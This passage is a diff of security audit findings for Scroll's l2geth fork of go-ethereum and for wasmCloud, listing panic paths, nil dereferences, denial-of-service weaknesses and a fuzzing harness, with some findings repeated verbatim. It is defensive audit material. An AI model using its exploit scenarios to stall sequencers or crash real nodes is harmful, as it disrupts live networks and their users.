RPC requests. (go-ethereum/trie/zk_trie.go#44–48) func (s *StateAccount) MarshalFields() ([]zkt.Byte32, uint32) { fields := make([]zkt.Byte32, 5) if s.Balance == nil { panic("StateAccount balance nil") } if !utils.CheckBigIntInField(s.Balance) { panic("StateAccount balance overflow") } if !utils.CheckBigIntInField(s.Root.Big()) { panic("StateAccount root overflow") } if !utils.CheckBigIntInField(new(big.Int).SetBytes(s.PoseidonCodeHash)) { panic("StateAccount poseidonCodeHash overflow") } Figure 4.2: The MarshalFields function panics when attempting to marshal an object that does not match certain requirements. This function may be called during the execution of certain RPC requests. (go-ethereum/core/types/state_account_marshalling.go#47–64) func (t *ProofTracer) MarkDeletion(key []byte) { if path, existed := t.emptyTermPaths[string(key)]; existed { // copy empty node terminated path for final scanning t.rawPaths[string(key)] = path } else if path, existed = t.rawPaths[string(key)]; existed { // sanity check leafNode := path[len(path)-1] if leafNode.Type != zktrie.NodeTypeLeaf { panic("all path recorded in proofTrace should be ended with leafNode") } Figure 4.3: The MarkDeletion function panics when the proof tracer contains a path that does not terminate in a leaf node. This function may be called when a syncing node attempts to process an invalid, malicious proof that an attacker has gossiped on the network. (go-ethereum/trie/zktrie_deletionproof.go#120–130) Exploit Scenario An attacker identifies an error path that terminates with a panic that can be triggered by a malformed RPC request or proof payload. The attacker leverages this issue to either disrupt the sequencer’s operation or prevent follower/syncing nodes from operating properly. Recommendations Short term, review all uses of panic that have been introduced by Scroll’s changes to go-ethereum. Ensure that these uses of panic truly represent unrecoverable errors, and if not, add error handling logic to recover from the errors. Long term, annotate all valid uses of panic with explanations for why the errors are unrecoverable and, if applicable, how to prevent the unrecoverable conditions from being triggered. l2geth’s code review process must also be updated to verify that this documentation exists for new uses of panic that are introduced later. +5. Risk of panic from nil dereference due to flawed error reporting in addressToKey Severity: Informational Difficulty: N/A Type: Error Reporting Finding ID: TOB-L2GETH-5 Target: trie/zkproof/writer.go Description The addressToKey function, shown in figure 5.1, returns a nil pointer instead of a Go error when an error is returned by the preImage.Hash() function, which will cause a nil dereference panic in the NewZkTrieProofWriter function, as shown in figure 5.2. If the error generated by preImage.Hash() is unrecoverable, the addressToKey function should panic instead of silently returning a nil pointer. func addressToKey(addr common.Address) *zkt.Hash { var preImage zkt.Byte32 copy(preImage[:], addr.Bytes()) h, err := preImage.Hash() if err != nil { log.Error("hash failure", "preImage", hexutil.Encode(preImage[:])) return nil } return zkt.NewHashFromBigInt(h) } Figure 5.1: The addressToKey function returns a nil pointer to zkt.Hash when an error is returned by preImage.Hash(). (go-ethereum/trie/zkproof/writer.go#31–41) func NewZkTrieProofWriter(storage *types.StorageTrace) (*zktrieProofWriter, error) { underlayerDb := memorydb.New() zkDb := trie.NewZktrieDatabase(underlayerDb) accounts := make(map[common.Address]*types.StateAccount) // resuming proof bytes to underlayerDb for addrs, proof := range storage.Proofs { if n := resumeProofs(proof, underlayerDb); n != nil { addr := common.HexToAddress(addrs) if n.Type == zktrie.NodeTypeEmpty { accounts[addr] = nil } else if acc, err := types.UnmarshalStateAccount(n.Data()); err == nil { if bytes.Equal(n.NodeKey[:], addressToKey(addr)[:]) { accounts[addr] = acc Figure 5.2: The addressToKey function is consumed by NewZkTrieProofWriter, which will attempt to dereference the nil pointer and generate a system panic. (go-ethereum/trie/zkproof/writer.go#152–167) Recommendations Short term, modify addressToKey so that it either returns an error that its calling functions can propagate or, if the error is unrecoverable, panics instead of returning a nil pointer. Long term, update Scroll’s code review and style guidelines to reflect that errors must be propagated by Go’s error system or must halt the program by using panic. +6. Risk of transaction pool admission denial of service Severity: Low Difficulty: Low Type: Denial of Service Finding ID: TOB-L2GETH-6 Target: core/tx_pool.go Description l2geth’s changes to the transaction pool include an ECDSA recovery operation at the beginning of the pool’s transaction validation logic, introducing a denial-of-service vector: an attacker could generate invalid transactions to exhaust the sequencer’s resources. l2geth adds an L1 fee that all L2 transactions must pay. To verify that an L2 transaction can afford the L1 fee, the transaction pool calls fees.VerifyFee(), as shown in figure 6.1. VerifyFee() performs an ECDSA recovery operation to determine the account that will pay the L1 fee, as shown in figure 6.2. ECDSA key recovery is an expensive operation that should be executed as late in the transaction validation process as possible in order to reduce the impact of denial-of-service attacks. func (pool *TxPool) add(tx *types.Transaction, local bool) (replaced bool, err error) { // If the transaction is already known, discard it hash := tx.Hash() if pool.all.Get(hash) != nil { log.Trace("Discarding already known transaction", "hash", hash) knownTxMeter.Mark(1) return false, ErrAlreadyKnown } // Make the local flag. If it's from local source or it's from the network but // the sender is marked as local previously, treat it as the local transaction. isLocal := local || pool.locals.containsTx(tx) if pool.chainconfig.Scroll.FeeVaultEnabled() { if err := fees.VerifyFee(pool.signer, tx, pool.currentState); err != nil { Figure 6.1: TxPool.add() calls fees.VerifyFee() before any other transaction validators are called. (go-ethereum/core/tx_pool.go#684–697) func VerifyFee(signer types.Signer, tx *types.Transaction, state StateDB) error { from, err := types.Sender(signer, tx) if err != nil { return errors.New("invalid transaction: invalid sender") } Figure 6.2: VerifyFee() initiates an ECDSA recovery operation via types.Sender(). (go-ethereum/rollup/fees/rollup_fee.go#198–202) Exploit Scenario An attacker generates a denial-of-service attack against the sequencer by submitting extraordinarily large transactions. Because ECDSA recovery is a CPU-intensive operation and is executed before the transaction size is checked, the attacker is able to exhaust the memory resources of the sequencer. Recommendations Short term, modify the code to check for L1 fees in the TxPool.validateTx() function immediately after that function calls types.Sender(). This will ensure that other, less expensive-to-check validations are performed before the ECDSA signature is recovered. Long term, exercise caution when making changes to code paths that validate information received from public sources or gossip. For changes to the transaction pool, a good general rule of thumb is to validate transaction criteria in the following order: +1. Simple, in-memory criteria that do not require disk reads or data manipulation +2. Criteria that require simple, in-memory manipulations of the data such as checks of the transaction size +3. Criteria that require an in-memory state trie to be checked +4. ECDSA recovery operations +5. Criteria that require an on-disk state trie to be checked However, note that sometimes these criteria must be checked out of order; for example, the ECDSA recovery operation to identify the origin account may need to be performed before the state trie is checked to determine whether the account can afford the transaction. +7. Syncing nodes fail to check consensus rule for L1 message count Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-L2GETH-7 Target: core/block_validator.go Description l2geth adds a consensus rule requiring that there be no more than L1Config.NumL1MessagesPerBlock number of L1 messages per L2 block. This rule is checked by the sequencer when building new blocks but is not checked by syncing nodes through the ValidateL1Messages function, as shown in figure 7.1. // TODO: consider adding a rule to enforce L1Config.NumL1MessagesPerBlock. // If there are L1 messages available, sequencer nodes should include them. // However, this is hard to enforce as different nodes might have different views of L1. Figure 7.1: The ValidateL1Messages function does not check the NumL1MessagesPerBlock restriction. (go-ethereum/core/block_validator.go#145–147) The TODO comment shown in the figure expresses a concern that syncing nodes cannot enforce NumL1MessagesPerBlock due to the different view of L1 that the nodes may have; however, this issue does not prevent syncing nodes from simply checking the number of L1 messages included in the block. Exploit Scenario A malicious sequencer ignores the NumL1MessagesPerBlock restriction while constructing a block, thus bypassing the consensus rules. Follower nodes consider the block to be valid even though the consensus rule is violated. Recommendations Short term, add a check to ValidateL1Messages to check the maximum number of L1 messages per block restriction. Long term, document and check all changes to the system’s consensus rules to ensure that both nodes that construct blocks and nodes that sync blocks check the consensus rules. This includes having syncing nodes check whether an L1 transaction actually exists on the L1, a concern expressed in comments further up in the ValidateL1Messages function. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Decentralization The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades Documentation The presence of comprehensive and readable codebase documentation Transaction Ordering Risks Memory Safety and Error Handling Low-Level Manipulation Testing and Verification Rating Criteria Rating Strong The system’s resistance to transaction re-ordering attacks The presence of memory safety and robust error-handling mechanisms The justified use of inline assembly and low-level calls The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Unchecked Errors List The following table lists the various unhandled Go errors, as reported in finding TOB-L2GETH-2. Location Functions with Unchecked Errors trie/zkproof/writer.go, line 226 underlayerDb.Put() trie/zkproof/writer.go, line 57 db.Put() trie/sync.go, line 297 trie/sync.go, line 279 trie/proof.go, line 567 trie/proof.go, line 497 trie/proof.go, line 86 trie/committer.go, line 229 trie/committer.go, line 235 s.commit() s.commit() tr.TryUpdate() tr.TryUpdate() proofDb.Put() c.onleaf() c.onleaf() trie/committer.go, line 245 c.sha.Write() trie/committer.go, line 256 c.sha.Read() trie/database.go, line 581 db.preimages.commit() trie/database.go, line 659 batch.Put() trie/database.go, line 676 db.preimages.commit() trie/database.go, line 695 batch.Replay() trie/database.go, line 743 batch.Replay() trie/database.go, line 850 db.saveCache() D. Code Quality Findings This appendix contains findings that do not have immediate or obvious security implications. However, they may facilitate exploit chains targeting other vulnerabilities or become easily exploitable in future releases. ● Avoid the use of magic values. The use of hard-coded magic values within code introduces ambiguity because they lack clear context, making it challenging for developers/auditors to understand their purpose and significance. By using variables or constants, meaningful names can be provided to these values, offering self-documentation and improving code comprehension. func toWordSize(size uint64) uint64 { if size > math.MaxUint64-31 { return math.MaxUint64/32 + 1 } return (size + 31) / 32 } Figure D.1: go-ethereum/core/state_transition.go#173–179 func IterateL1MessagesFrom(db ethdb.Iteratee, fromQueueIndex uint64) L1MessageIterator { start := encodeQueueIndex(fromQueueIndex) it := db.NewIterator(l1MessagePrefix, start) keyLength := len(l1MessagePrefix) + 8 Figure D.2: go-ethereum/core/rawdb/accessors_l1_message.go#108–112 ● Remove redundant code. Clean up the redundant code related to handling uncle blocks and forks, as the codebase does not recognize or produce uncle blocks. Removing this unnecessary functionality will simplify the code, making it easier to understand and maintain. ● Address TODO statements or create tickets for them. TODO statements should remain in a codebase only while the codebase is in a pre-release state. Address TODO statements that can be addressed immediately; for those that cannot be addressed before production deployment, create tickets to ensure that they are prioritized. ● Use feature flags to control network behavior instead of using reflection or magic hashes. Some features in l2geth use reflection or the presence of a specific hash in a database to determine whether certain features are enabled, as in the VerifyProof function, shown in figure D.3. Feature flags provide a better, more unified interface to enable or disable specific features or functionality. If a function needs to operate in multiple, simultaneous modes, an encapsulating function should be used to make it clear that the behavior is not specific to a network feature. func VerifyProof(rootHash common.Hash, key []byte, proofDb ethdb.KeyValueReader) (value []byte, err error) { // test the type of proof (for trie or SMT) if buf, _ := proofDb.Get(magicHash); buf != nil { return VerifyProofSMT(rootHash, key, proofDb) } key = keybytesToHex(key) wantHash := rootHash for i := 0; ; i++ { Figure D.3: The VerifyProof function uses the presence of a magic hash to determine what kind of proof to verify. (go-ethereum/trie/proof.go#106–115) diff --git a/findings_newupdate/tob/2023-08-scrollL2geth-securityreview.txt b/findings_newupdate/tob/2023-08-scrollL2geth-securityreview.txt new file mode 100644 index 0000000..5803815 --- /dev/null +++ b/findings_newupdate/tob/2023-08-scrollL2geth-securityreview.txt @@ -0,0 +1,5 @@ +1. Attacker can prevent L2 transactions from being added to a block Severity: High Difficulty: Low Type: Denial of Service Finding ID: TOB-L2GETH-1 Target: miner/worker.go Description The commitTransactions function returns a flag that determines whether to halt transaction production, even if the block has room for more transactions to be added. If the circuit checker returns an error either for row consumption being too high or reasons unknown, the circuitCapacityReached flag is set to true (figure 1.1). case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && tx.IsL1MessageTx()): // Circuit capacity check: L1MessageTx row consumption too high, shift to the next from the account, // because we shouldn't skip the entire txs from the same account. // This is also useful for skipping "problematic" L1MessageTxs. queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace("Circuit capacity limit reached for a single tx", "tx", tx.Hash().String(), "queueIndex", queueIndex) log.Info("Skipping L1 message", "queueIndex", queueIndex, "tx", tx.Hash().String(), "block", w.current.header.Number, "reason", "row consumption overflow") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && !tx.IsL1MessageTx()): // Circuit capacity check: L2MessageTx row consumption too high, skip the account. // This is also useful for skipping "problematic" L2MessageTxs. log.Trace("Circuit capacity limit reached for a single tx", "tx", tx.Hash().String()) // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L1MessageTx, // shift to the next from the account because we shouldn't skip the entire txs from the same account queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace("Unknown circuit capacity checker error for L1MessageTx", "tx", tx.Hash().String(), "queueIndex", queueIndex) log.Info("Skipping L1 message", "queueIndex", queueIndex, "tx", tx.Hash().String(), "block", w.current.header.Number, "reason", "unknown row consumption error") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && !tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L2MessageTx, skip the account log.Trace("Unknown circuit capacity checker error for L2MessageTx", "tx", tx.Hash().String()) // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop Figure 1.1: Error handling for the circuit capacity checker (worker.go#L1073-L1121) When this flag is set to true, no new transactions will be added even if there is room for additional transactions in the block (figure 1.2). // Fill the block with all available pending transactions. pending := w.eth.TxPool().Pending(true) // Short circuit if there is no available pending transactions. // But if we disable empty precommit already, ignore it. Since // empty block is necessary to keep the liveness of the network. if len(pending) == 0 && pendingL1Txs == 0 && atomic.LoadUint32(&w.noempty) == 0 { w.updateSnapshot() return } // Split the pending transactions into locals and remotes localTxs, remoteTxs := make(map[common.Address]types.Transactions), pending for _, account := range w.eth.TxPool().Locals() { if txs := remoteTxs[account]; len(txs) > 0 { delete(remoteTxs, account) localTxs[account] = txs } } var skipCommit, circuitCapacityReached bool if w.chainConfig.Scroll.ShouldIncludeL1Messages() && len(l1Txs) > 0 { log.Trace("Processing L1 messages for inclusion", "count", pendingL1Txs) txs := types.NewTransactionsByPriceAndNonce(w.current.signer, l1Txs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(localTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, localTxs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(remoteTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, remoteTxs, header.BaseFee) // don't need to get `circuitCapacityReached` here because we don't have further `commitTransactions` // after this one, and if we assign it won't take effect (`ineffassign`) skipCommit, _ = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } // do not produce empty blocks if w.current.tcount == 0 { return } w.commit(uncles, w.fullTaskHook, true, tstart) Figure 1.2: Pending transactions are not added if the circuit capacity has been reached. (worker.go#L1284-L1332) Exploit Scenario Eve, an attacker, sends an L2 transaction that uses ecrecover many times. The transaction is provided to the mempool with enough gas to be the first L2 transaction in the blockchain. Because this causes an error in the circuit checker, it prevents all other L2 transactions from being executed in this block. Recommendations Short term, implement a snapshotting mechanism in the circuit checker to roll back unexpected changes made as a result of incorrect or incomplete computation. Long term, analyze and document all impacts of error handling across the system to ensure that these errors are handled gracefully. Additionally, clearly document all expected invariants of how the system is expected to behave to ensure that in interactions with other components, these invariants hold throughout the system. +2. Unused and dead code Severity: Informational Difficulty: N/A Type: Undefined Behavior Finding ID: TOB-L2GETH-2 Target: Throughout the code Description Due to the infrastructure setup of this network and the use of a single node clique setup, this fork of geth contains a significant amount of unused logic. Continuing to maintain this code can be problematic and may lead to issues. The following are examples of unused and dead code: ● Uncle blocks—with a single node clique network, there is no chance for uncle blocks to exist, so all the logic that handles and interacts with uncle blocks can be dropped. ● Redundant logic around updating the L1 queue index ● A redundant check on empty blocks in the worker.go file Recommendations Short term, remove anything that is no longer relevant for the current go-etheruem implementation and be sure to document all the changes to the codebase. Long term, remove all unused code from the codebase. +1. Attacker can prevent L2 transactions from being added to a block Severity: High Difficulty: Low Type: Denial of Service Finding ID: TOB-L2GETH-1 Target: miner/worker.go Description The commitTransactions function returns a flag that determines whether to halt transaction production, even if the block has room for more transactions to be added. If the circuit checker returns an error either for row consumption being too high or reasons unknown, the circuitCapacityReached flag is set to true (figure 1.1). case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && tx.IsL1MessageTx()): // Circuit capacity check: L1MessageTx row consumption too high, shift to the next from the account, // because we shouldn't skip the entire txs from the same account. // This is also useful for skipping "problematic" L1MessageTxs. queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace("Circuit capacity limit reached for a single tx", "tx", tx.Hash().String(), "queueIndex", queueIndex) log.Info("Skipping L1 message", "queueIndex", queueIndex, "tx", tx.Hash().String(), "block", w.current.header.Number, "reason", "row consumption overflow") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && !tx.IsL1MessageTx()): // Circuit capacity check: L2MessageTx row consumption too high, skip the account. // This is also useful for skipping "problematic" L2MessageTxs. log.Trace("Circuit capacity limit reached for a single tx", "tx", tx.Hash().String()) // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L1MessageTx, // shift to the next from the account because we shouldn't skip the entire txs from the same account queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace("Unknown circuit capacity checker error for L1MessageTx", "tx", tx.Hash().String(), "queueIndex", queueIndex) log.Info("Skipping L1 message", "queueIndex", queueIndex, "tx", tx.Hash().String(), "block", w.current.header.Number, "reason", "unknown row consumption error") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && !tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L2MessageTx, skip the account log.Trace("Unknown circuit capacity checker error for L2MessageTx", "tx", tx.Hash().String()) // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop Figure 1.1: Error handling for the circuit capacity checker (worker.go#L1073-L1121) When this flag is set to true, no new transactions will be added even if there is room for additional transactions in the block (figure 1.2). // Fill the block with all available pending transactions. pending := w.eth.TxPool().Pending(true) // Short circuit if there is no available pending transactions. // But if we disable empty precommit already, ignore it. Since // empty block is necessary to keep the liveness of the network. if len(pending) == 0 && pendingL1Txs == 0 && atomic.LoadUint32(&w.noempty) == 0 { w.updateSnapshot() return } // Split the pending transactions into locals and remotes localTxs, remoteTxs := make(map[common.Address]types.Transactions), pending for _, account := range w.eth.TxPool().Locals() { if txs := remoteTxs[account]; len(txs) > 0 { delete(remoteTxs, account) localTxs[account] = txs } } var skipCommit, circuitCapacityReached bool if w.chainConfig.Scroll.ShouldIncludeL1Messages() && len(l1Txs) > 0 { log.Trace("Processing L1 messages for inclusion", "count", pendingL1Txs) txs := types.NewTransactionsByPriceAndNonce(w.current.signer, l1Txs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(localTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, localTxs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(remoteTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, remoteTxs, header.BaseFee) // don't need to get `circuitCapacityReached` here because we don't have further `commitTransactions` // after this one, and if we assign it won't take effect (`ineffassign`) skipCommit, _ = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } // do not produce empty blocks if w.current.tcount == 0 { return } w.commit(uncles, w.fullTaskHook, true, tstart) Figure 1.2: Pending transactions are not added if the circuit capacity has been reached. (worker.go#L1284-L1332) Exploit Scenario Eve, an attacker, sends an L2 transaction that uses ecrecover many times. The transaction is provided to the mempool with enough gas to be the first L2 transaction in the blockchain. Because this causes an error in the circuit checker, it prevents all other L2 transactions from being executed in this block. Recommendations Short term, implement a snapshotting mechanism in the circuit checker to roll back unexpected changes made as a result of incorrect or incomplete computation. Long term, analyze and document all impacts of error handling across the system to ensure that these errors are handled gracefully. Additionally, clearly document all expected invariants of how the system is expected to behave to ensure that in interactions with other components, these invariants hold throughout the system. +2. Unused and dead code Severity: Informational Difficulty: N/A Type: Undefined Behavior Finding ID: TOB-L2GETH-2 Target: Throughout the code Description Due to the infrastructure setup of this network and the use of a single node clique setup, this fork of geth contains a significant amount of unused logic. Continuing to maintain this code can be problematic and may lead to issues. The following are examples of unused and dead code: ● Uncle blocks—with a single node clique network, there is no chance for uncle blocks to exist, so all the logic that handles and interacts with uncle blocks can be dropped. ● Redundant logic around updating the L1 queue index ● A redundant check on empty blocks in the worker.go file Recommendations Short term, remove anything that is no longer relevant for the current go-etheruem implementation and be sure to document all the changes to the codebase. Long term, remove all unused code from the codebase. +3. Lack of documentation Severity: Informational Difficulty: N/A Type: Unexpected Behavior Finding ID: TOB-L2GETH-3 Target: miner/worker.go Description Certain areas of the codebase lack documentation, high-level descriptions, and examples, which makes the contracts difficult to review and increases the likelihood of user mistakes. Areas that would benefit from being expanded and clarified in code and documentation include the following: ● Internals of the CCC. Despite being treated as a black box, the code relies on stateful changes made from geth calls. This suggests that the internal states of the miner's work and the CCC overlap. The lack of documentation regarding these states creates a lack of visibility in evaluating whether there are potential state corruptions or unexpected behavior. ● Circumstances where transactions are skipped and how they are expected to be handled. During the course of the review, we attempted to reverse engineer the intended behavior of transactions considered skipped by the CCC. The lack of documentation in these areas results in unclear expectations for this code. ● Error handling standard throughout the system. The codebase handles system errors differently—in some cases, logging an error and continuing execution or logging traces. Listing out all instances where errors are identified and documenting how they are handled can help ensure that there is no unexpected behavior related to error handling. The documentation should include all expected properties and assumptions relevant to the aforementioned aspects of the codebase. Recommendations Short term, review and properly document the aforementioned aspects of the codebase. In addition to external documentation, NatSpec and inline code comments could help clarify complexities. Long term, consider writing a formal specification of the protocol. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Decentralization The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades Documentation The presence of comprehensive and readable codebase documentation Front-Running Resistance Low-Level Manipulation The system’s resistance to front-running attacks The justified use of inline assembly and low-level calls Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Code Quality Recommendations The following recommendations are not associated with specific vulnerabilities. However, they enhance code readability and may prevent the introduction of vulnerabilities in the future. ● Consider simplifying the switch case statements that check whether transactions are L1 messages or not. The current error handling in commitTransactions makes the codebase hard to read. ● Separate logic intended for production deployment from logic introduced for testing purposes. For example, the worker.go file contains functions and if conditions for zero-period cliques or side-chain events, which are used only in testing. Removing these from the core codebase would make the contracts significantly more readable. ● Fix the spelling error on the ErrNonceTooHigh log with the correct spelling of height instead of hight. Correct spelling ensures that expected system behavior is clear. diff --git a/findings_newupdate/tob/2023-09-wasmCloud-securityreview.txt b/findings_newupdate/tob/2023-09-wasmCloud-securityreview.txt new file mode 100644 index 0000000..936b737 --- /dev/null +++ b/findings_newupdate/tob/2023-09-wasmCloud-securityreview.txt @@ -0,0 +1,9 @@ +1. Out-of-bounds crash in extract_claims Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-WACL-1 Target: wascap/src/wasm.rs Description The strip_custom_section function does not sufficiently validate data and crashes when the range is not within the buffer (figure 1.1). The function is used in the extract_claims function and is given an untrusted input. In the wasmCloud-otp , even though extract_claims is called as an Erlang NIF (Native Implemented Function) and potentially could bring down the VM upon crashing, the panic is handled gracefully by the Rustler library, resulting in an isolated crash of the Elixir process. if let Some ((id, range )) = payload.as_section() { wasm_encoder::RawSection { id, data: & buf [range] , } .append_to(& mut output); } Figure 1.1: wascap/src/wasm.rs#L161-L167 We found this issue by fuzzing the extract_claims function with cargo-fuzz (figure 2.1). #![no_main] use libfuzzer_sys::fuzz_target; use getrandom::register_custom_getrandom; // TODO: the program won’t compile without this, why? fn custom_getrandom (buf: & mut [ u8 ]) -> Result <(), getrandom::Error> { return Ok (()); } register_custom_getrandom!(custom_getrandom); fuzz_target!(|data: & [ u8 ]| { let _ = wascap::wasm::extract_claims(data); }); Figure 1.2: A simple extract_claims fuzzing harness that passes the fuzzer-provided bytes straight to the function After fixing the issue (figure 1.3), we fuzzed the function for an extended period of time; however, we found no additional issues. if let Some ((id, range)) = payload.as_section() { if range.end <= buf.len() { wasm_encoder::RawSection { id, data: & buf [range], } .append_to(& mut output); } else { return Err (errors::new(ErrorKind::InvalidCapability)); } } Figure 1.3: The fix we applied to continue fuzzing extract_claims . The code requires a new error value because we reused one of the existing ones that likely does not match the semantics. Exploit Scenario An attacker deploys a new module with invalid claims. While decoding the claims, the extract_claims function panics and crashes the Elixir process. Recommendations Short term, fix the strip_custom_section function by adding the range check, as shown in the figure 1.3. Add the extract_claims fuzzing harness to the wascap repository and run it for an extended period of time before each release of the library. Long term, add a fuzzing harness for each Rust function that processes user-provided data. References ● Erlang - NIFs +2. Stack 